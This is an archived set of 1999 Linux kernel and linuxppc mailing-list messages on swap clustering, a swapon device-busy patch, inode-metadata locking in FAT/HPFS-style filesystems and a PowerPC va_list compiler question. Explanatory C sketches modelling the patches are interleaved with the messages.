+	   With those constraints in mind, we have chosen to implement
+	   this like a switch and not calculate the value in code. This
+	   should hopefully make this more readable. However, if the 
+	   maximum cluster value for swapping out is increased, it may
+	   make sense to generalize this code then.
+	*/
+
 	if (num_physpages < ((16 * 1024 * 1024) >> PAGE_SHIFT))
 		page_cluster = 2;
 	else if (num_physpages < ((32 * 1024 * 1024) >> PAGE_SHIFT))
 		page_cluster = 3;
-	else
+	else if (num_physpages < ((64 * 1024 * 1024) >> PAGE_SHIFT))
 		page_cluster = 4;
+	else 
+		page_cluster = 5;
 }
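
For anyone who wants to compare the thresholds with a closed form, here
is a small userspace sketch. It works in whole megabytes rather than
pages, and page_cluster_switch, page_cluster_formula and floor_log2 are
hypothetical helper names, not kernel functions. As far as I can tell the
if/else chain in the patch matches floor(log2(M / 2)) clamped to the
range 2..5; the floor(log2(M / 4)) in the comment comes out one lower in
the middle ranges (for example 2 rather than 3 at 16 MB), which fits the
"approximately" in the comment.

```c
#include <assert.h>

/* Thresholds as in the patch, expressed in whole megabytes. */
int page_cluster_switch(unsigned long mem_mb)
{
    if (mem_mb < 16)
        return 2;
    else if (mem_mb < 32)
        return 3;
    else if (mem_mb < 64)
        return 4;
    else
        return 5;
}

/* floor(log2(x)) for x >= 1, using integer shifts only. */
static int floor_log2(unsigned long x)
{
    int n = 0;

    assert(x >= 1);
    while (x >>= 1)
        n++;
    return n;
}

/* Closed form: floor(log2(M / 2)), clamped to the range 2..5. */
int page_cluster_formula(unsigned long mem_mb)
{
    int c;

    assert(mem_mb >= 2);
    c = floor_log2(mem_mb / 2);
    if (c < 2)
        c = 2;
    if (c > 5)
        c = 5;
    return c;
}
```

The two functions agree for every whole-megabyte size from 2 MB upwards
that I tried, so the switch could be replaced by the clamped formula if
the upper bound ever changes.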



On Tue, 11 May 1999, Rik van Riel wrote:

> On Tue, 11 May 1999, Joseph Pranevich wrote:
> 
> > I've been gradually sifting my way through the kernel source and I
> > have a few minor questions about memory management.
> 
> linux-mm@kvack.org	(majordomo-managed)
> http://www.linux.eu.org/Linux-MM/
> 
> > 1) swap.c : page clustering?
> 
> > 	else
> > 		page_cluster = 4;
> > 
> > This is fine, but wouldn't it make sense to generalize this, or is
> > the benefit not as great with larger amounts of RAM?
> 
> The swapOUT clustering is only done to a maximum of 32 (2^5)
> pages, so it doesn't make much sense to read in more pages
> (which are probably unrelated to the current process).
> 
> For mmap() reading we might want to switch to a smarter
> algorithm though. Not with reading in more pages, but with
> reading in the _next_ area while the program is still busy
> processing this one. The idea is to have all data in memory
> just before the process needs it :)
> 
> 
> > 2) swapfile.c : sys_swapon() question 1
> > 
> > I'm unable to figure out exactly what this code is supposed to be
> > doing. Can someone help me out here? I don't understand why we set
> > the blocksize twice or what the funniness is with "filp"
> > 
> > 		p->swap_device = swap_dentry->d_inode->i_rdev;
> > 		set_blocksize(p->swap_device, PAGE_SIZE);
> 
> We do I/O on this device in chunks of PAGE_SIZE.
> 
> > 		filp.f_dentry = swap_dentry;
> > 		filp.f_mode = 3; /* read write */
> 
> Of course, we want to have our swap device read-write and we
> mark it with a magic number so no harm will come to it...
> 
> > 		set_blocksize(p->swap_device, PAGE_SIZE);
> 
> Hmm, haven't we seen this one before? Stephen?
> 
> 
> > I do apologise for the many questions, I'm just trying to get a
> > feel for the swapping subsystem. I apologise if this is already
> > documented someplace.
> 
> AFAIK it's not yet documented. I'd really appreciate it
> if you could do that and send me the docs for inclusion
> on the Linux-MM site...
> 
> cheers,
> 
> Rik -- Open Source: you deserve to be in control of your data.
> +-------------------------------------------------------------------+
> | Le Reseau netwerksystemen BV:               http://www.reseau.nl/ |
> | Linux Memory Management site:   http://www.linux.eu.org/Linux-MM/ |
> | Nederlandse Linux documentatie:          http://www.nl.linux.org/ |
> +-------------------------------------------------------------------+
> 


^ permalink raw reply	[relevance 58%]

* Re: Swap Questions (includes possible bug) - swapfile.c / swap.c
  1999-05-12 10:30 64% Manfred Spraul
@ 1999-05-12 18:36 64% ` Stephen C. Tweedie
  1999-05-12 19:45 44%   ` Manfred Spraul
  0 siblings, 1 reply; 200+ results
From: Stephen C. Tweedie @ 1999-05-12 18:36 UTC (permalink / raw)
  To: Manfred Spraul; +Cc: Rik van Riel, Joseph Pranevich, Linux Kernel, Linux MM

Hi,

On Wed, 12 May 1999 12:30:27 +0200, "Manfred Spraul"
<masp0008@stud.uni-sb.de> said:

> There is another problem with this line:
> set_blocksize() also means that the previous block size
> doesn't work anymore:
> if you accidentally enter 'swapon /dev/hda1' (my root drive)
> instead of 'swapon /dev/hda3', then you have to fsck:

Yep, it would make perfect sense to move the set_blocksize to be after
the EBUSY check.

--Stephen

^ permalink raw reply	[relevance 64%]

* Re: Swap Questions (includes possible bug) - swapfile.c / swap.c
  1999-05-12 18:36 64% ` Stephen C. Tweedie
@ 1999-05-12 19:45 44%   ` Manfred Spraul
  0 siblings, 0 replies; 200+ results
From: Manfred Spraul @ 1999-05-12 19:45 UTC (permalink / raw)
  To: Stephen C. Tweedie
  Cc: Manfred Spraul, Rik van Riel, Joseph Pranevich, Linux Kernel,
	Linux MM

[-- Attachment #1: Type: text/plain, Size: 1432 bytes --]

"Stephen C. Tweedie" wrote:
> 
> Hi,
> 
> On Wed, 12 May 1999 12:30:27 +0200, "Manfred Spraul"
> <masp0008@stud.uni-sb.de> said:
> 
> > There is another problem with this line:
> > set_blocksize() also means that the previous block size
> > doesn't work anymore:
> > if you accidentally enter 'swapon /dev/hda1' (my root drive)
> > instead of 'swapon /dev/hda3', then you have to fsck:
> 
> Yep, it would make perfect sense to move the set_blocksize to be after
> the EBUSY check.

Unfortunately that doesn't solve the problem:
The current EBUSY check checks that the partition is not used as a
swap partition, it doesn't check the VFS, and it doesn't check
whether the RAID driver uses the volume.

I've attached an old patch (vs.2.2.6):
I've sent that patch to linux-kernel@vger, Alan (..wait until Linus
returns from vacation..), Linus (no reply).

The patch adds a bitmap to the block cache for EBUSY checks.
Actually, we can use this bitmap for other bits if we use devfs and
dynamic MAJOR/MINOR codes:
we must replace all 'MAJOR==LOOP', 'MAJOR==IDE' etc. if we want to
support dynamic block device MAJOR/MINOR's.

Additionally, we save 6-8 kB kernel memory. (ro_bits was an 8 kB
static array).
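
The bitmap idea can be sketched in user-space C as below. This is only
an illustration, not the attached patch: the sketch_* names are made up,
SKETCH_MAX_MAJOR = 256 and SKETCH_MINOR_BITS = 8 are assumed values
standing in for MAX_BLKDEV and MINORBITS, and calloc() stands in for
kmalloc() plus memset(). Under those assumptions, and with 4-byte longs,
the old array costs 256 * 8 * 4 = 8192 bytes, while a table allocated on
first use costs 32 bytes per bitmap for each major actually touched.

```c
#include <assert.h>
#include <stdlib.h>

/* Assumed values for illustration; the real ones come from kernel headers. */
#define SKETCH_MAX_MAJOR   256u
#define SKETCH_MINOR_BITS  8u
#define SKETCH_MINORS      (1u << SKETCH_MINOR_BITS)

/* One bit per minor number, packed eight to a byte. */
struct sketch_dev_bits {
	unsigned char busy[SKETCH_MINORS / 8];
};

/* Per-major tables, NULL until the first bit is set or cleared. */
static struct sketch_dev_bits *sketch_table[SKETCH_MAX_MAJOR];

/* Returns 1 if (major, minor) is marked busy, 0 otherwise. */
int sketch_is_busy(unsigned int major, unsigned int minor)
{
	if (major >= SKETCH_MAX_MAJOR || minor >= SKETCH_MINORS)
		return 0;
	if (sketch_table[major] == NULL)
		return 0;	/* never touched, so not busy */
	return (sketch_table[major]->busy[minor >> 3] >> (minor & 7)) & 1;
}

/* Sets or clears the busy bit; returns 0 on success, -1 on failure. */
int sketch_set_busy(unsigned int major, unsigned int minor, int flag)
{
	if (major >= SKETCH_MAX_MAJOR || minor >= SKETCH_MINORS)
		return -1;
	if (sketch_table[major] == NULL) {
		/* calloc() zeroes the table, so every minor starts idle. */
		sketch_table[major] = calloc(1, sizeof(struct sketch_dev_bits));
		if (sketch_table[major] == NULL)
			return -1;
	}
	assert(sketch_table[major] != NULL);
	if (flag)
		sketch_table[major]->busy[minor >> 3] |= 1u << (minor & 7);
	else
		sketch_table[major]->busy[minor >> 3] &= ~(1u << (minor & 7));
	return 0;
}
```

Unlike the ALLOC_KDEV_BITS() macro in the patch, the setter here reports
an allocation failure to its caller instead of returning silently; that
is a choice made for the sketch, not something the patch does.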

If you think that the patch is useful, then I'll make a new patch
vs 2.3.0, otherwise I'll wait until devfs is added, and I'll
try to write a larger patch (dynamic MAJOR/MINOR for block cache)
that includes this one.

--
	Manfred

[-- Attachment #2: patch_busy-2.2.6 --]
[-- Type: text/plain, Size: 5707 bytes --]

diff -r -u -P -x CVS -x *,v 2.2.6/drivers/block/ll_rw_blk.c current/drivers/block/ll_rw_blk.c
--- 2.2.6/drivers/block/ll_rw_blk.c	Wed Mar 31 00:56:57 1999
+++ current/drivers/block/ll_rw_blk.c	Thu Apr 22 18:02:20 1999
@@ -16,6 +16,7 @@
 #include <linux/config.h>
 #include <linux/locks.h>
 #include <linux/mm.h>
+#include <linux/slab.h>
 #include <linux/init.h>
 
 #include <asm/system.h>
@@ -241,8 +242,24 @@
 }
 
 /* RO fail safe mechanism */
+/* device busy: (C) Manfred Spraul masp0008@stud.uni-sb.de */
 
-static long ro_bits[MAX_BLKDEV][8];
+struct kdev_bits {
+	unsigned char ro_bits[(1U << MINORBITS)/8];
+	unsigned char busy_bits[(1U << MINORBITS)/8];
+};
+
+static struct kdev_bits* kdev_info[MAX_BLKDEV] = { NULL, NULL };
+
+#define ALLOC_KDEV_BITS(major) \
+	if (kdev_info[major] == NULL) { \
+		kdev_info[major] = kmalloc(sizeof(struct kdev_bits),GFP_KERNEL); \
+		if(kdev_info[major] == NULL) { \
+			printk("ALLOC_KDEV_BITS() failed due to ENOMEM.\n"); \
+			return; \
+		} \
+		memset(kdev_info[major],0,sizeof(struct kdev_bits)); \
+	}
 
 int is_read_only(kdev_t dev)
 {
@@ -251,7 +268,8 @@
 	major = MAJOR(dev);
 	minor = MINOR(dev);
 	if (major < 0 || major >= MAX_BLKDEV) return 0;
-	return ro_bits[major][minor >> 5] & (1 << (minor & 31));
+	if (kdev_info[major] == NULL) return 0;
+     	return kdev_info[major]->ro_bits[minor >> 3] & (1 << (minor & 7));
 }
 
 void set_device_ro(kdev_t dev,int flag)
@@ -261,10 +279,39 @@
 	major = MAJOR(dev);
 	minor = MINOR(dev);
 	if (major < 0 || major >= MAX_BLKDEV) return;
-	if (flag) ro_bits[major][minor >> 5] |= 1 << (minor & 31);
-	else ro_bits[major][minor >> 5] &= ~(1 << (minor & 31));
+	ALLOC_KDEV_BITS(major)
+	if (flag)
+		kdev_info[major]->ro_bits[minor >> 3] |= 1 << (minor & 7);
+	 else
+		kdev_info[major]->ro_bits[minor >> 3] &= ~(1 << (minor & 7));
+}
+
+int is_device_busy(kdev_t dev)
+{
+	int minor,major;
+
+	major = MAJOR(dev);
+	minor = MINOR(dev);
+	if (major < 0 || major >= MAX_BLKDEV) return 0;
+	if (kdev_info[major] == NULL) return 0;
+	return kdev_info[major]->busy_bits[minor >> 3] & (1 << (minor & 7));
 }
 
+void set_device_busy(kdev_t dev,int flag)
+{
+	int minor,major;
+	
+	major = MAJOR(dev);
+	minor = MINOR(dev);
+	if (major < 0 || major >= MAX_BLKDEV) return;
+	ALLOC_KDEV_BITS(major)
+	if (flag)
+		kdev_info[major]->busy_bits[minor >> 3] |= 1 << (minor & 7);
+	 else
+		kdev_info[major]->busy_bits[minor >> 3] &= ~(1 << (minor & 7));
+}
+
+
 static inline void drive_stat_acct(int cmd, unsigned long nr_sectors,
                                    short disk_index)
 {
@@ -731,7 +778,6 @@
 		req->rq_status = RQ_INACTIVE;
 		req->next = NULL;
 	}
-	memset(ro_bits,0,sizeof(ro_bits));
 	memset(max_readahead, 0, sizeof(max_readahead));
 	memset(max_sectors, 0, sizeof(max_sectors));
 #ifdef CONFIG_AMIGA_Z2RAM
diff -r -u -P -x CVS -x *,v 2.2.6/fs/super.c current/fs/super.c
--- 2.2.6/fs/super.c	Tue Apr 20 13:41:57 1999
+++ current/fs/super.c	Thu Apr 22 18:02:20 1999
@@ -131,6 +131,7 @@
 		vfsmnttail->mnt_next = lptr;
 		vfsmnttail = lptr;
 	}
+	set_device_busy(sb->s_dev,1);
 out:
 	return lptr;
 }
@@ -165,6 +166,8 @@
 	kfree(tofree->mnt_devname);
 	kfree(tofree->mnt_dirname);
 	kfree_s(tofree, sizeof(struct vfsmount));
+
+	set_device_busy(dev,0);
 }
 
 int register_filesystem(struct file_system_type * fs)
@@ -873,6 +876,8 @@
 	if (dir_d->d_covers != dir_d)
 		goto dput_and_out;
 
+	if (is_device_busy(dev))
+		goto dput_and_out;
 	/*
 	 * Note: If the superblock already exists,
 	 * read_super just does a get_super().
diff -r -u -P -x CVS -x *,v 2.2.6/include/linux/fs.h current/include/linux/fs.h
--- 2.2.6/include/linux/fs.h	Tue Apr 20 13:41:58 1999
+++ current/include/linux/fs.h	Thu Apr 22 18:02:20 1999
@@ -839,6 +839,8 @@
 extern struct buffer_head * find_buffer(kdev_t dev, int block, int size);
 extern void ll_rw_block(int, int, struct buffer_head * bh[]);
 extern int is_read_only(kdev_t);
+extern int is_device_busy(kdev_t);
+extern void set_device_busy(kdev_t dev, int flag);
 extern void __brelse(struct buffer_head *);
 extern inline void brelse(struct buffer_head *buf)
 {
diff -r -u -P -x CVS -x *,v 2.2.6/kernel/ksyms.c current/kernel/ksyms.c
--- 2.2.6/kernel/ksyms.c	Wed Mar 31 00:56:57 1999
+++ current/kernel/ksyms.c	Thu Apr 22 18:02:20 1999
@@ -47,7 +47,7 @@
 #endif
 
 extern char *get_options(char *str, int *ints);
-extern void set_device_ro(kdev_t dev,int flag);
+extern void set_device_ro(kdev_t dev, int flag);
 extern struct file_operations * get_blkfops(unsigned int);
 extern int blkdev_release(struct inode * inode);
 #if !defined(CONFIG_NFSD) && defined(CONFIG_NFSD_MODULE)
@@ -209,6 +209,8 @@
 EXPORT_SYMBOL(blk_dev);
 EXPORT_SYMBOL(is_read_only);
 EXPORT_SYMBOL(set_device_ro);
+EXPORT_SYMBOL(is_device_busy);
+EXPORT_SYMBOL(set_device_busy);
 EXPORT_SYMBOL(bmap);
 EXPORT_SYMBOL(sync_dev);
 EXPORT_SYMBOL(get_blkfops);
diff -r -u -P -x CVS -x *,v 2.2.6/mm/swapfile.c current/mm/swapfile.c
--- 2.2.6/mm/swapfile.c	Wed Mar 31 00:56:57 1999
+++ current/mm/swapfile.c	Thu Apr 22 18:02:20 1999
@@ -414,6 +414,7 @@
 			filp.f_op->release(dentry->d_inode,&filp);
 			filp.f_op->release(dentry->d_inode,&filp);
 		}
+		set_device_busy(p->swap_device,0);
 	}
 	dput(dentry);
 
@@ -531,6 +532,10 @@
 
 	if (S_ISBLK(swap_dentry->d_inode->i_mode)) {
 		p->swap_device = swap_dentry->d_inode->i_rdev;
+		if(is_device_busy(p->swap_device)) {
+			error = -EBUSY;
+			goto bad_swap;
+		}
 		set_blocksize(p->swap_device, PAGE_SIZE);
 		
 		filp.f_dentry = swap_dentry;
@@ -686,6 +691,8 @@
 		swap_info[prev].next = p - swap_info;
 	}
 	error = 0;
+	if(p->swap_device != 0)
+		set_device_busy(p->swap_device,1);
 	goto out;
 bad_swap:
 	if(filp.f_op && filp.f_op->release)


^ permalink raw reply	[relevance 44%]

* [FYI][RFC] Way to deal with filesystems with jumping pieces of inodes (was Re: HPFS bug in lookup())
       [not found]     <Pine.LNX.3.96.990515232120.14004A-101000@artax.karlin.mff.cuni.cz>
@ 1999-05-16  4:40 35% ` Alexander Viro
  0 siblings, 0 replies; 200+ results
From: Alexander Viro @ 1999-05-16  4:40 UTC (permalink / raw)
  To: Mikulas Patocka; +Cc: linux-fsdevel, linux-kernel


[D'oh! It grew longer than I expected. Sorry. Originally it was going to be
a reply to email from Mikulas, but probably it's worth Cc'ing to lists.
Apologies for the head of the text - I've tried to give some explanation
of the context. Short summary: how to deal with filesystems that keep bits
and pieces of inode in a directory without excessive locking and races.]

	As we all know, decent and sane filesystems keep inode metadata out
of the directories.  The problem being: not all filesystems are sane or
even decent.  With respect to fs driver it means that we are going to have
a lot of potential races between the write_inode() method and *every*
namespace-modifying one.  Usual solutions involve a lot of locking, are
not too clean deadlock-wise and either heavily penalize write_inode() or
involve a lot of complications in namespace stuff (namei.c).
	I tried to construct a clean way to deal with those issues when
I did a FAT cleanup.  Situation with FAT had additional component of fun
- it has *no* out-of-directory metadata and that means that we have no
chance for even remotely sane iget().  Inumbers should stay constant for
the whole lifetime of in-core inode and that alone killed the idea of
using metadata location as inumber.  rename() could change it and we had
to reserve the directory entries of unlinked-but-still-open files.  As the
result FAT driver and derived filesystem drivers had extremely complicated
mess in directory/inode/namespace handling and contained both the rough
locking and really impressive collection of races.  During that Spring I
did a rewrite of directory/inode handling in FAT and massive cleanup of
msdosfs and VFAT namespace handling. Some fixes went into 2.2.x, the whole
thing is in 2.3.2.
	It seems that some parts of the aforementioned rewrite can be
useful for other filesystems, in particular for HPFS.  Here it comes:

	The main problem with keeping inode metadata in directories is that
VFS provides some protection from races, but it doesn't (and shouldn't) 
serialize write_inode() wrt namespace manipulations.  Said manipulations
are serialized within the same directory, but that's it.  write_inode()
may be called when the parent directory is in the middle of a change.
So some amount of serialization should be done within fs driver.
	Proposed solution is based on the following: VFS removes 'dirty' bit
on inode *before* the write_inode() is called.  So if mark_inode_dirty()
happens when write_inode() is still in progress we will get the same result
as if it would be called immediately after the write_inode() completion.
Suppose we can easily find an inode that owns given piece of in-directory
metadata.  Then we can use the following strategy:
	a) keep a per-fs spinlock.
	b) store the location of in-directory metadata in fs-specific
part of in-core inode (->u.foo_i.location)
	c) define two primitives: attach_inode(inode, location) and
detach_inode(inode).
	attach_inode(inode, pos) should grab the spinlock, set
inode->u.foo_i.location to pos and release the spinlock.
	detach_inode(inode) should grab the spinlock, set
inode->u.foo_i.location to some reserved value (0 seems to be a natural
choice) and release the spinlock.
	d) whenever the namespace-modifying operation is going to move
or delete a directory entry it should find whether it is owned by some
in-core inode (in many cases it will be immediately known to calling function)
and if it indeed is, do detach_inode(inode).  If we are moving the entry
we should do attach_inode(inode, new_location); mark_inode_dirty(inode);
afterwards.
	e) write_inode() method should do the following:
		Write normal part of inode;
	     retry:
		pos = inode->u.foo_i.location;
		if (pos == DETACHED)
			return;
		bh = bread(dev, BLOCK_BY_LOCATION(pos), sb->s_blocksize);
		spin_lock(&spinlock);
		if (pos != inode->u.foo_i.location) {
			spin_unlock(&spinlock);
			brelse(bh);
			goto retry;
		}
		Put in-directory metadata to the right place of bh->b_data.
		spin_unlock(&spinlock);
		mark_buffer_dirty(bh, 1);
		brelse(bh);

How does it work? First of all, with such a strategy write_inode() is guaranteed to
put the in-directory metadata into the right place.  Since after the move
we are doing attach_inode() we are guaranteed that metadata *will* be written.
Notice that we don't search for in-directory metadata upon write_inode().
Which is *big* win in case of filesystems a-la HPFS.
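
A user-space model of steps (b), (c) and (e) might look like the sketch
below. It is not FAT or HPFS driver code: the sketch_inode structure,
the disk[] array and the slot encoding are invented for illustration, a
C11 atomic_flag stands in for the per-fs spinlock, and indexing disk[]
stands in for bread(). The point it tries to show is the retry: the
location is sampled without the lock (because reading the block may
sleep) and then re-checked once the lock is held.

```c
#include <assert.h>
#include <stdatomic.h>

#define DETACHED 0u	/* reserved "no location" value */
#define NBLOCKS  4u	/* assumed size of the fake disk */
#define SLOTS    8u	/* assumed metadata slots per block */

/* Stand-in for the directory blocks on disk. */
static unsigned int disk[NBLOCKS][SLOTS];

/* Stand-in for the fs-specific part of an in-core inode. */
struct sketch_inode {
	unsigned int location;	/* slot number + 1, or DETACHED */
	unsigned int metadata;	/* the in-directory part of the inode */
};

/* Stand-in for the per-fs spinlock. */
static atomic_flag fs_lock = ATOMIC_FLAG_INIT;

static void fs_spin_lock(void)
{
	while (atomic_flag_test_and_set(&fs_lock))
		;	/* spin */
}

static void fs_spin_unlock(void)
{
	atomic_flag_clear(&fs_lock);
}

void attach_inode(struct sketch_inode *inode, unsigned int pos)
{
	assert(pos != DETACHED && pos <= NBLOCKS * SLOTS);
	fs_spin_lock();
	inode->location = pos;
	fs_spin_unlock();
}

void detach_inode(struct sketch_inode *inode)
{
	fs_spin_lock();
	inode->location = DETACHED;
	fs_spin_unlock();
}

/* Returns 1 if the metadata was written, 0 if the inode was detached. */
int write_inode_metadata(struct sketch_inode *inode)
{
	unsigned int pos;
	unsigned int *block;

retry:
	/* Unlocked snapshot; a truly concurrent version of this model
	 * would need an atomic read here. */
	pos = inode->location;
	if (pos == DETACHED)
		return 0;
	block = disk[(pos - 1) / SLOTS];	/* plays the role of bread() */

	fs_spin_lock();
	if (pos != inode->location) {
		/* The entry moved while we were fetching the block. */
		fs_spin_unlock();
		goto retry;
	}
	block[(pos - 1) % SLOTS] = inode->metadata;
	fs_spin_unlock();
	return 1;
}
```

A rename would then be modelled as detach_inode(inode), moving the
entry, and attach_inode(inode, new_pos) followed by marking the inode
dirty; the buffer handling (mark_buffer_dirty(), brelse()) is left out
of the model.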

	Potential penalty is in finding an in-core inode by the chunk of
metadata.  In case of relatively sane filesystems it can be done with
trimmed-down version of iget() that would return NULL instead of trying
to read the inode from disk.  Another possibility (the only possibility for
filesystems without decent inumbers) is more interesting and in principle
gives better performance.  It relies on another trick: shadow pointers to
inodes. Actually this technique may be useful not only here. There we go:

	You can safely keep references to in-core inode *not counting them
in ->i_count and not disturbing icache behaviour* if
	a) you provide ->clear_inode() method and forget all 'shadow'
references to inode as soon as foo_clear_inode(inode) is called.
	b) you must serialize all dereferencing of shadow references wrt
foo_clear_inode().
	c) to obtain a normal reference you should call igrab(foo) and it
will either give you a safe reference to the same inode (i.e. increment
foo->i_count and return foo) or it will return NULL, in which case you should
act as if foo has been forgotten (see (a)).
	d) You should serialize calls of igrab() wrt foo_clear_inode().

	For example, if you want to keep a hash-table of inodes you can do it
in the following way:
	* hold a spinlock whenever you are doing a search or modification
	  of said hash.
	* start foo_clear_inode(inode) with removing the inode from hash
	  (grabbing the same lock, indeed).
	* in the very end of hash search (before releasing the spinlock)
	  pass the result of search (if something was found, indeed) to
	  igrab() and if igrab() will return NULL consider it as "not found".
With obvious modifications it can be used to deal with arbitrary data
structures. 
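
The hash-table recipe can be modelled in user-space C roughly as
follows. Everything named sk_* is hypothetical: sk_igrab() only imitates
the behaviour described here for igrab() (NULL once the inode is being
freed, otherwise one more counted reference), the freeing field stands
in for I_FREEING, and a C11 atomic_flag stands in for the spinlock. The
hash chain pointers are the "shadow" references: they are never counted.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stddef.h>

#define SK_HASH_SIZE 16u

struct sk_inode {
	unsigned long key;	/* e.g. location of in-directory metadata */
	int count;		/* stand-in for ->i_count */
	int freeing;		/* stand-in for I_FREEING in ->i_state */
	struct sk_inode *next;	/* hash chain, not counted in count */
};

static struct sk_inode *sk_hash[SK_HASH_SIZE];
static atomic_flag sk_lock = ATOMIC_FLAG_INIT;

static void sk_spin_lock(void)
{
	while (atomic_flag_test_and_set(&sk_lock))
		;	/* spin */
}

static void sk_spin_unlock(void)
{
	atomic_flag_clear(&sk_lock);
}

/* Model of igrab(): refuses inodes that are already being torn down. */
struct sk_inode *sk_igrab(struct sk_inode *inode)
{
	if (inode->freeing)
		return NULL;
	inode->count++;
	return inode;
}

/* Adds a shadow reference to the hash; does not touch count. */
void sk_hash_insert(struct sk_inode *inode)
{
	assert(inode->next == NULL);
	sk_spin_lock();
	inode->next = sk_hash[inode->key % SK_HASH_SIZE];
	sk_hash[inode->key % SK_HASH_SIZE] = inode;
	sk_spin_unlock();
}

/* What a ->clear_inode() method would start with: unhash under the lock. */
void sk_clear_inode(struct sk_inode *inode)
{
	struct sk_inode **p;

	sk_spin_lock();
	for (p = &sk_hash[inode->key % SK_HASH_SIZE]; *p; p = &(*p)->next) {
		if (*p == inode) {
			*p = inode->next;
			inode->next = NULL;
			break;
		}
	}
	sk_spin_unlock();
}

/* Search; the hit goes through sk_igrab() before the lock is dropped. */
struct sk_inode *sk_hash_find(unsigned long key)
{
	struct sk_inode *p, *res = NULL;

	sk_spin_lock();
	for (p = sk_hash[key % SK_HASH_SIZE]; p; p = p->next) {
		if (p->key == key) {
			res = sk_igrab(p);	/* NULL means "not found" */
			break;
		}
	}
	sk_spin_unlock();
	return res;
}
```

Because the grab happens before the lock is released, and unhashing
takes the same lock, a lookup can never hand out a pointer that has
already been forgotten by sk_clear_inode().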

	Why is it tricky?  Well, we don't want to disturb icache behaviour
(i.e. fiddle with inode reusing, etc.), so we can't protect references with
i_count.  The whole point of the exercise is to allow icache to take inodes
from us whenever it normally would.  So we have to do something to avoid
dangling references.
	Why does it work?  Icache always calls ->clear_inode() before reusing
the thing.  So the whole affair was the matter of setting I_FREEING in
inode->i_state when the call of clear_inode() becomes inevitable (i.e. when
the thing can't be salvaged by iget() anymore).  igrab() was trivial -
essentially it checks for I_FREEING in ->i_state and either returns NULL
or increments ->i_count and returns its argument (it also has to grab
inode_lock, etc. - see details in fs/inode.c, the thing is a ten-liner).

	Application of the above to the search of inode by in-directory
metadata is trivial - we can use ->u.foo_i.location as hash index, make
{attach,detach}_inode() hash/unhash the thing and use the same spinlock
for all serialization needed (->write_inode, attach_inode, detach_inode and
hash search; ->clear_inode() should start from detach_inode() and it will
automatically give us needed protection).
	It is faster than icache search simply because the hash is smaller -
only inodes belonging to the fs driver in question.
	In many cases we simply know the in-core inode from the very beginning.
E.g. if we are doing rename() on FAT-derived filesystem we have the dentry
and inode *before* we've seen the directory entry. Non-trivial cases when
we really need to search may happen with filesystems a-la HPFS, where we
have to move directory entries of completely unrelated objects (HPFS keeps
directories as B-trees).
	Notice that search through dcache (after all, we know the parent) is
not enough here.  Consider the following scenario: inode of /foo/bar is dirty.
Something invoked shrink_dcache().  Dentry of /foo/bar is tossed away.  iput()
is applied to the inode.  Now suppose that some operation reshuffles /foo,
moving the directory entry of bar.  Since /foo/bar is no longer in dcache
we would miss the inode in question.  Fun, fun - it's right in the middle
of write_inode() and is going to write something into the old place in /foo.


-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/

^ permalink raw reply	[relevance 35%]

* possible egcs c compiler bug
@ 1999-05-19 20:19 62% Thomas C. Allison
  1999-05-19 20:56 64% ` Brad Boyer
                   ` (2 more replies)
  0 siblings, 3 replies; 200+ results
From: Thomas C. Allison @ 1999-05-19 20:19 UTC (permalink / raw)
  To: linuxppc-user; +Cc: linuxppc-dev


I have found what *appears* to be a bug in the C compiler.  I have experienced
this bug in R4 (regardless of the compiler/library installed) as well as in
the latest (i.e. all the latest packages through 5/15/1999) pre-R5
installation.  I include a short program below which illustrates the problem
I am having.  The code compiles without error on my i386 machine
running RHL 5.2.  The version of EGCS on the PC is 1.0.3 versus 1.1.2 on my
PowerMac, so I don't know if this is a PPC problem or an EGCS problem.
Any input is greatly appreciated.

The code is as follows:

test.c:

     #include <stdio.h>
     #include <stdarg.h>

     static int myFunction(va_list inList)
     {
        va_list newList;
        newList = inList;
     }

When I try to compile the code

     % gcc -c test.c

I get the following error message

     test.c: In function `myFunction':
     test.c:7: incompatible types in assignment

Any ideas?

Thanks in advance,

Tom

+------------------------------------------------------------------------------+
| Dr. Thomas C. Allison                          | thomas.allison@nist.gov     |
| Computational Chemistry Group                  | (301)975-2216 (voice)       |
| National Institute of Standards and Technology | (301)869-4020 (fax)         |
| 100 Bureau Drive, Stop 8380                    |                             |
| Gaithersburg, Maryland 20899-8380              |                             |
+------------------------------------------------------------------------------+
  Chemistry is applied theology.  --- Augustus Stanley Owsley III

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 62%]

* Re: possible egcs c compiler bug
  1999-05-19 20:19 62% possible egcs c compiler bug Thomas C. Allison
@ 1999-05-19 20:56 64% ` Brad Boyer
  1999-05-19 21:04 64% ` Hartmut Koptein
  1999-05-19 21:26 64% ` Franz Sirl
  2 siblings, 0 replies; 200+ results
From: Brad Boyer @ 1999-05-19 20:56 UTC (permalink / raw)
  To: Thomas C. Allison; +Cc: linuxppc-user, linuxppc-dev


> I have found what *appears* to be a bug in the C compiler.  I have experienced
> this bug in R4 (regardless of the compiler/library installed) as well as in
> the latest (i.e. all the latest packages through 5/15/1999) pre-R5
> installation.  I include a short program below which illustrates the problem
> I am having.  The code compiles without error on my i386 machine
> running RHL 5.2.  The version of EGCS on the PC is 1.0.3 versus 1.1.2 on my
> PowerMac, so I don't know if this is a PPC problem or an EGCS problem.
> Any input is greatly appreciated.

"It's not a bug, it's a feature"...

You're using something that is not technically the proper way to use
va_list in your code.  However, that code works on everything but ppc.
It has to do with the way va_list is implemented on any ppc platform,
and causes all sorts of strange things to happen when you don't follow
the spec closely enough.  Find a better way to copy the va_list.  Just
using the = operator isn't enough on ppc.  Use a block copy of
sizeof(va_list) bytes, or some such.  This has come up before, so if
you search the list archives, you should find sample code.  Someone
else could give a lot more details on this.  I only know the general
overview.

      Brad Boyer
      flar@cegt201.bradley.edu


^ permalink raw reply	[relevance 64%]

* Re: possible egcs c compiler bug
  1999-05-19 20:19 62% possible egcs c compiler bug Thomas C. Allison
  1999-05-19 20:56 64% ` Brad Boyer
@ 1999-05-19 21:04 64% ` Hartmut Koptein
  1999-05-19 21:26 64% ` Franz Sirl
  2 siblings, 0 replies; 200+ results
From: Hartmut Koptein @ 1999-05-19 21:04 UTC (permalink / raw)
  To: Thomas C. Allison; +Cc: linuxppc-user, linuxppc-dev


